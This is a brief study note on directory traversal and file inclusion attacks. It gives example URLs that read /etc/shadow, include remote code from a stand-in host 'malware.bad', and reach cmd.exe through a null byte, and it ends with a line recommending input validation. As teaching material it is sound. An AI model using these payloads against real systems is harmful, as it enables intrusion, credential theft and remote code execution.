**<http://cat-bounce.com/../../../../etc/shadow**>
Unix systems use **../**
Windows systems use **..\\** by default but may also accept the Unix like **../**

File Inclusion

Remote File Inclusion

<https://cat-bounce.com/login.php?user=http://malware.bad/malicious.php>

Local File Inclusion

<https://cat-bounce.com/login.php?user=../../Windows/System32/cmd.exe%00>

To prevent directory traversals and file inclusion attacks, use proper input validation